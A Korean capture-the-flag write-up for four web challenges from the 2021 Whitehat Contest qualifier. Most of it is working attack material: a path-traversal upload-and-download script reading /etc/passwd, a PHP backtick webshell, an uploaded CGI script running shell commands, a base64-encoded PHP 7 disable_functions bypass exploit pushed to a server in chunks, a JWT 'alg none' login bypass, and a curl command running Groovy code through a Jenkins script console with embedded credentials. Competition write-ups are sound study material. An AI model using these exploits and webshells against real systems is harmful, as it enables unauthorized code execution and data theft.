2021 화이트햇콘테스트(예선) 웹 분야 라이트업 (Whitehat Contest 2021)

Imageflare (v1)

files = { 'file':('..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd', f, 'image/png') }

 

위와같이 file name을 구성함으로써 file download가 가능해진다

from arang import *
import re,sys

def dopow(x):
	for i in range(0,10000000):
		if hexencode(sha1(str(i)))[:5] == x:
			return i
	return 'false'

fname = urlencode(f"../../../../../../../../../../../../{sys.argv[1]}").replace("/","%2f")

u = 'http://imageflare-v2.eyes-on.me/index.php'
headers = {
	'Cookie' : 'PHPSESSID=kbjdpdq19mrb40hqvf78ruov6e'
}
proxies = {"https":"https://127.0.0.1:8888/", "http":"http://127.0.0.1:8888/"}

r = requests.get(u, headers=headers, verify=False)
powvalue = r.content.decode().split('PoW: Solve <code>sha1(x)[:5] == ')[1].split('</code>')[0]
print(powvalue)

f = open(r"D:\jw\tmp\a.png", 'rb')
print(fname)
files = {
	'file':(fname, f, 'image/png')
}

data = {"pow":dopow(powvalue.encode()), "upload":"제출"}


u = 'http://imageflare-v2.eyes-on.me/file_up.php'
r = requests.post(u, data=data, headers=headers, files=files, verify=False)
print(r.content)

u = 'http://imageflare-v2.eyes-on.me/index.php'
r = requests.get(u, headers=headers, verify=False)

rr = r.content.decode()

matches = re.findall("./download.php\\?sig=[0-9a-f]{32}\">.+</a>", rr)
for i in matches:
	print(i)

sig = matches[-1].split('sig=')[1].split('"')[0]
print(sig)
r = requests.get(f"http://imageflare-v2.eyes-on.me/download.php?sig={sig}", headers=headers, verify=False)
print(r.content.decode())

 

File download 자동화 스크립트를 짰다

 

 

 

 

<?=`$_GET[c]`?> 가 담긴 jpg를 업로드

 

그러면 나타난 시그니처_파일명 이 /uploads/ 디렉터리 밑에 저장되기 때문에 직접 접근하면 쉘을 얻을 수 있다

 

 

 

---

Imageflare v2

 

앞부분은 v1과 동일하다

 

python으로 작성된 cgi파일을 ../cgi-bin/arang911.py로 업로드하였다

 

#!/usr/bin/python3.6
import cgi
import os
print("Content-type: text/html;\n")
print(os.popen("ls -l /").read())
print(os.popen("cat /reveeeeeeeeeeenge_flag").read())
#define width 10000
#define height 10000

#define을 통해 xbm은 image size를 parsing하기 때문에 getimagesize 우회된다. (위 사진은 xbm을 파싱하는 php 소스코드)

 

Realip를 알아야 cloudflare 뒷단에 직접 접근이 가능한데, 이는 Sublist3r 도구를 통해 나오는 도메인으로 알게되었다.

 

 

어쨌든 cgi로 임의 명령 실행이 가능하다

---

mudbox

 

pht가 뚫려있다

 

php파일 만드는 친구를 올리고 실행

맘대로 실행할수 있는 php가 생겼다

 

disable_functions가 걸려있으니 우회하기 위해 1day exploit을 찾아보면,

 

https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php 2020년에 발견된게 있다.

 

 

현재 php버전이 7.2.24니까 docker받아서 로컬테스트해보면 익스가 잘 되는것을 알 수 있다.

 

from arang import *
import re,sys,time

ex = urlencode('''PD9waHANCg0KcHduKCIkX0dFVFtjY2NdIik7DQoNCmZ1bmN0aW9uIHB3bigkY21kKSB7DQogICAgZ2xvYmFsICRhYmMsICRoZWxwZXIsICRiYWNrdHJhY2U7DQoNCiAgICBjbGFzcyBWdWxuIHsNCiAgICAgICAgcHVibGljICRhOw0KICAgICAgICBwdWJsaWMgZnVuY3Rpb24gX19kZXN0cnVjdCgpIHsgDQogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgDQogICAgICAgICAgICB1bnNldCgkdGhpcy0+YSk7DQogICAgICAgICAgICAkYmFja3RyYWNlID0gKG5ldyBFeGNlcHRpb24pLT5nZXRUcmFjZSgpOyANCiAgICAgICAgICAgIGlmKCFpc3NldCgkYmFja3RyYWNlWzFdWydhcmdzJ10pKSB7DQogICAgICAgICAgICAgICAgJGJhY2t0cmFjZSA9IGRlYnVnX2JhY2t0cmFjZSgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgfQ0KDQogICAgY2xhc3MgSGVscGVyIHsNCiAgICAgICAgcHVibGljICRhLCAkYiwgJGMsICRkOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHN0cjJwdHIoJiRzdHIsICRwID0gMCwgJHMgPSA4KSB7DQogICAgICAgICRhZGRyZXNzID0gMDsNCiAgICAgICAgZm9yKCRqID0gJHMtMTsgJGogPj0gMDsgJGotLSkgew0KICAgICAgICAgICAgJGFkZHJlc3MgPDw9IDg7DQogICAgICAgICAgICAkYWRkcmVzcyB8PSBvcmQoJHN0clskcCskal0pOw0KICAgICAgICB9DQogICAgICAgIHJldHVybiAkYWRkcmVzczsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBwdHIyc3RyKCRwdHIsICRtID0gOCkgew0KICAgICAgICAkb3V0ID0gIiI7DQogICAgICAgIGZvciAoJGk9MDsgJGkgPCAkbTsgJGkrKykgew0KICAgICAgICAgICAgJG91dCAuPSBjaHIoJHB0ciAmIDB4ZmYpOw0KICAgICAgICAgICAgJHB0ciA+Pj0gODsNCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gJG91dDsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiB3cml0ZSgmJHN0ciwgJHAsICR2LCAkbiA9IDgpIHsNCiAgICAgICAgJGkgPSAwOw0KICAgICAgICBmb3IoJGkgPSAwOyAkaSA8ICRuOyAkaSsrKSB7DQogICAgICAgICAgICAkc3RyWyRwICsgJGldID0gY2hyKCR2ICYgMHhmZik7DQogICAgICAgICAgICAkdiA+Pj0gODsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGxlYWsoJGFkZHIsICRwID0gMCwgJHMgPSA4KSB7DQogICAgICAgIGdsb2JhbCAkYWJjLCAkaGVscGVyOw0KICAgICAgICB3cml0ZSgkYWJjLCAweDY4LCAkYWRkciArICRwIC0gMHgxMCk7DQogICAgICAgICRsZWFrID0gc3RybGVuKCRoZWxwZXItPmEpOw0KICAgICAgICBpZigkcyAhPSA4KSB7ICRsZWFrICU9IDIgPDwgKCRzICogOCkgLSAxOyB9DQogICAgICAgIHJldHVybiAkbGVhazsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBwYXJzZV9lbGYoJGJhc2UpIHsNCiAgICAgICAgJGVfdHlwZSA9IGxlYWsoJGJhc2UsIDB4MTAsIDIpOw0KDQogICAgICAgICRlX3Bob2ZmID0gbGVhaygkYmFzZSwgMHgyMCk7DQogICAgICAgICRlX3BoZW50c2l6ZSA9IGxlYWsoJGJhc2UsIDB4MzYsIDIpOw0KICAgICAgICAkZV9waG51bSA9IGxlYWsoJGJhc2UsIDB4MzgsIDIpOw0KDQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgJGVfcGhudW07ICRpKyspIHsNCiAgICAgICAgICAgICRoZWFkZXIgPSAkYmFzZSArICRlX3Bob2ZmICsgJGkgKiAkZV9waGVudHNpemU7DQogICAgICAgICAgICAkcF90eXBlICA9IGxlYWsoJGhlYWRlciwgMCwgNCk7DQogICAgICAgICAgICAkcF9mbGFncyA9IGxlYWsoJGhlYWRlciwgNCwgNCk7DQogICAgICAgICAgICAkcF92YWRkciA9IGxlYWsoJGhlYWRlciwgMHgxMCk7DQogICAgICAgICAgICAkcF9tZW1zeiA9IGxlYWsoJGhlYWRlciwgMHgyOCk7DQoNCiAgICAgICAgICAgIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA2KSB7IA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRkYXRhX2FkZHIgPSAkZV90eXBlID09IDIgPyAkcF92YWRkciA6ICRiYXNlICsgJHBfdmFkZHI7DQogICAgICAgICAgICAgICAgJGRhdGFfc2l6ZSA9ICRwX21lbXN6Ow0KICAgICAgICAgICAgfSBlbHNlIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA1KSB7IA0KICAgICAgICAgICAgICAgICR0ZXh0X3NpemUgPSAkcF9tZW1zejsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KDQogICAgICAgIGlmKCEkZGF0YV9hZGRyIHx8ICEkdGV4dF9zaXplIHx8ICEkZGF0YV9zaXplKQ0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KDQogICAgICAgIHJldHVybiBbJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZV07DQogICAgfQ0KDQogICAgZnVuY3Rpb24gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSB7DQogICAgICAgIGxpc3QoJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZSkgPSAkZWxmOw0KICAgICAgICBmb3IoJGkgPSAwOyAkaSA8ICRkYXRhX3NpemUgLyA4OyAkaSsrKSB7DQogICAgICAgICAgICAkbGVhayA9IGxlYWsoJGRhdGFfYWRkciwgJGkgKiA4KTsNCiAgICAgICAgICAgIGlmKCRsZWFrIC0gJGJhc2UgPiAwICYmICRsZWFrIC0gJGJhc2UgPCAkZGF0YV9hZGRyIC0gJGJhc2UpIHsNCiAgICAgICAgICAgICAgICAkZGVyZWYgPSBsZWFrKCRsZWFrKTsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBpZigkZGVyZWYgIT0gMHg3NDZlNjE3NDczNmU2ZjYzKQ0KICAgICAgICAgICAgICAgICAgICBjb250aW51ZTsNCiAgICAgICAgICAgIH0gZWxzZSBjb250aW51ZTsNCg0KICAgICAgICAgICAgJGxlYWsgPSBsZWFrKCRkYXRhX2FkZHIsICgkaSArIDQpICogOCk7DQogICAgICAgICAgICBpZigkbGVhayAtICRiYXNlID4gMCAmJiAkbGVhayAtICRiYXNlIDwgJGRhdGFfYWRkciAtICRiYXNlKSB7DQogICAgICAgICAgICAgICAgJGRlcmVmID0gbGVhaygkbGVhayk7DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYoJGRlcmVmICE9IDB4Nzg2NTY4MzI2ZTY5NjIpDQogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KICAgICAgICAgICAgfSBlbHNlIGNvbnRpbnVlOw0KDQogICAgICAgICAgICByZXR1cm4gJGRhdGFfYWRkciArICRpICogODsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGdldF9iaW5hcnlfYmFzZSgkYmluYXJ5X2xlYWspIHsNCiAgICAgICAgJGJhc2UgPSAwOw0KICAgICAgICAkc3RhcnQgPSAkYmluYXJ5X2xlYWsgJiAweGZmZmZmZmZmZmZmZmYwMDA7DQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgMHgxMDAwOyAkaSsrKSB7DQogICAgICAgICAgICAkYWRkciA9ICRzdGFydCAtIDB4MTAwMCAqICRpOw0KICAgICAgICAgICAgJGxlYWsgPSBsZWFrKCRhZGRyLCAwLCA3KTsNCiAgICAgICAgICAgIGlmKCRsZWFrID09IDB4MTAxMDI0NjRjNDU3ZikgeyANCiAgICAgICAgICAgICAgICByZXR1cm4gJGFkZHI7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBmdW5jdGlvbiBnZXRfc3lzdGVtKCRiYXNpY19mdW5jcykgew0KICAgICAgICAkYWRkciA9ICRiYXNpY19mdW5jczsNCiAgICAgICAgZG8gew0KICAgICAgICAgICAgJGZfZW50cnkgPSBsZWFrKCRhZGRyKTsNCiAgICAgICAgICAgICRmX25hbWUgPSBsZWFrKCRmX2VudHJ5LCAwLCA2KTsNCg0KICAgICAgICAgICAgaWYoJGZfbmFtZSA9PSAweDZkNjU3NDczNzk3MykgeyANCiAgICAgICAgICAgICAgICByZXR1cm4gbGVhaygkYWRkciArIDgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgJGFkZHIgKz0gMHgyMDsNCiAgICAgICAgfSB3aGlsZSgkZl9lbnRyeSAhPSAwKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHRyaWdnZXJfdWFmKCRhcmcpIHsNCiAgICAgICAgDQogICAgICAgICRhcmcgPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsNCiAgICAgICAgJHZ1bG4gPSBuZXcgVnVsbigpOw0KICAgICAgICAkdnVsbi0+YSA9ICRhcmc7DQogICAgfQ0KDQogICAgaWYoc3RyaXN0cihQSFBfT1MsICdXSU4nKSkgew0KICAgICAgICBkaWUoJ1RoaXMgUG9DIGlzIGZvciAqbml4IHN5c3RlbXMgb25seS4nKTsNCiAgICB9DQoNCiAgICAkbl9hbGxvYyA9IDEwOyANCiAgICAkY29udGlndW91cyA9IFtdOw0KICAgIGZvcigkaSA9IDA7ICRpIDwgJG5fYWxsb2M7ICRpKyspDQogICAgICAgICRjb250aWd1b3VzW10gPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsNCg0KICAgIHRyaWdnZXJfdWFmKCd4Jyk7DQogICAgJGFiYyA9ICRiYWNrdHJhY2VbMV1bJ2FyZ3MnXVswXTsNCg0KICAgICRoZWxwZXIgPSBuZXcgSGVscGVyOw0KICAgICRoZWxwZXItPmIgPSBmdW5jdGlvbiAoJHgpIHsgfTsNCg0KICAgIGlmKHN0cmxlbigkYWJjKSA9PSA3OSB8fCBzdHJsZW4oJGFiYykgPT0gMCkgew0KICAgICAgICBkaWUoIlVBRiBmYWlsZWQiKTsNCiAgICB9DQoNCiAgICANCiAgICAkY2xvc3VyZV9oYW5kbGVycyA9IHN0cjJwdHIoJGFiYywgMCk7DQogICAgJHBocF9oZWFwID0gc3RyMnB0cigkYWJjLCAweDU4KTsNCiAgICAkYWJjX2FkZHIgPSAkcGhwX2hlYXAgLSAweGM4Ow0KDQogICAgDQogICAgd3JpdGUoJGFiYywgMHg2MCwgMik7DQogICAgd3JpdGUoJGFiYywgMHg3MCwgNik7DQoNCiAgICANCiAgICB3cml0ZSgkYWJjLCAweDEwLCAkYWJjX2FkZHIgKyAweDYwKTsNCiAgICB3cml0ZSgkYWJjLCAweDE4LCAweGEpOw0KDQogICAgJGNsb3N1cmVfb2JqID0gc3RyMnB0cigkYWJjLCAweDIwKTsNCg0KICAgICRiaW5hcnlfbGVhayA9IGxlYWsoJGNsb3N1cmVfaGFuZGxlcnMsIDgpOw0KICAgIGlmKCEoJGJhc2UgPSBnZXRfYmluYXJ5X2Jhc2UoJGJpbmFyeV9sZWFrKSkpIHsNCiAgICAgICAgZGllKCJDb3VsZG4ndCBkZXRlcm1pbmUgYmluYXJ5IGJhc2UgYWRkcmVzcyIpOw0KICAgIH0NCg0KICAgIGlmKCEoJGVsZiA9IHBhcnNlX2VsZigkYmFzZSkpKSB7DQogICAgICAgIGRpZSgiQ291bGRuJ3QgcGFyc2UgRUxGIGhlYWRlciIpOw0KICAgIH0NCg0KICAgIGlmKCEoJGJhc2ljX2Z1bmNzID0gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSkpIHsNCiAgICAgICAgZGllKCJDb3VsZG4ndCBnZXQgYmFzaWNfZnVuY3Rpb25zIGFkZHJlc3MiKTsNCiAgICB9DQoNCiAgICBpZighKCR6aWZfc3lzdGVtID0gZ2V0X3N5c3RlbSgkYmFzaWNfZnVuY3MpKSkgew0KICAgICAgICBkaWUoIkNvdWxkbid0IGdldCB6aWZfc3lzdGVtIGFkZHJlc3MiKTsNCiAgICB9DQoNCiAgICANCiAgICAkZmFrZV9vYmpfb2Zmc2V0ID0gMHhkMDsNCiAgICBmb3IoJGkgPSAwOyAkaSA8IDB4MTEwOyAkaSArPSA4KSB7DQogICAgICAgIHdyaXRlKCRhYmMsICRmYWtlX29ial9vZmZzZXQgKyAkaSwgbGVhaygkY2xvc3VyZV9vYmosICRpKSk7DQogICAgfQ0KDQogICAgDQogICAgd3JpdGUoJGFiYywgMHgyMCwgJGFiY19hZGRyICsgJGZha2Vfb2JqX29mZnNldCk7DQogICAgd3JpdGUoJGFiYywgMHhkMCArIDB4MzgsIDEsIDQpOyANCiAgICB3cml0ZSgkYWJjLCAweGQwICsgMHg2OCwgJHppZl9zeXN0ZW0pOyANCg0KICAgICgkaGVscGVyLT5iKSgkY21kKTsNCiAgICBleGl0KCk7DQp9''')

u = 'http://3.38.109.135:28344/data/72ced1fa15db322c3c900cba8f15cf46/test.php?c=echo%20file_put_contents(%27/tmp/arang101%27,file_get_contents(%27/tmp/arang101%27)."{}");'

for i in range(0,len(ex),1000):
	r = requests.get(u.format(ex[i:i+1000]))
	time.sleep(1)

대강 서버에 업로드 한 후 

file_put_contents("ex.php",str_replace("\r\n","\n",base64_decode(file_get_contents("/tmp/arang101"))));

이런식으로 현재경로로 익스코드를 가져온다

 

이후 접근하면

 

웹쉘 업로드 가능

 

---

mini-realworld

 

첨에는 제공된 react 코드좀 보다가 무지성 algo none 바꿔치기 했는데 로그인이 되어버렸다.

Nickname인 Whitehat-NowYouSeeMe를 github에 검색해봤다.

 

ㄷㄷㄷ

ㄷㄷㄷㄷㄷㄷㄷ

 

s3cret ㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷ

 

젠킨스 ㄷㄷㄷㄷㄷㄷ 9999 ㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷ

 

찐킨스 9999포트 ㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷㄷ

 

 

key와 아까 얻은 nickname으로 remote access해보면 결과가 잘 나온다.

 

https://beaglesecurity.com/blog/domectf2020/timezone-writeup.html

https://www.jenkins.io/doc/book/managing/script-console/

https://stackoverflow.com/questions/159148/groovy-executing-shell-commands

 

위에거 링크들 참조해서 했다

 

/script에 우선 접근 후 script run 날렸을때 실제 날아가는 패킷 잡아서 변조했다.

 

curl --data "script=def+proc+%3D+%22ls -alR /%22.execute%28%29%0D%0Adef+b+%3D+new+StringBuffer%28%29%0D%0Aproc.consumeProcessErrorStream%28b%29%0D%0A%0D%0Aprintln+proc.text%0D%0Aprintln+b.toString%28%29&Jenkins-Crumb=3aa12ac3ad49ab60ee63b3fdf4d5ba4d4978eacfb5785753ff0fb6fa69a4ba3c&json=%7B%22script%22%3A+%22def+proc+%3D+%5C%22ls+-al+%2F%5C%22.execute%28%29%5Cndef+b+%3D+new+StringBuffer%28%29%5Cnproc.consumeProcessErrorStream%28b%29%5Cn%5Cnprintln+proc.text%5Cnprintln+b.toString%28%29%22%2C+%22%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%223aa12ac3ad49ab60ee63b3fdf4d5ba4d4978eacfb5785753ff0fb6fa69a4ba3c%22%7D&Submit=Run" -X POST http://Whitehat-NowYouSeeMe:11d5eb71408ae9b0e4a6219ce9a4aa1767@3.37.166.114:9999/script -i > out.txt;cat out.txt|grep FLAG -B5 -A5

 

플래그 획득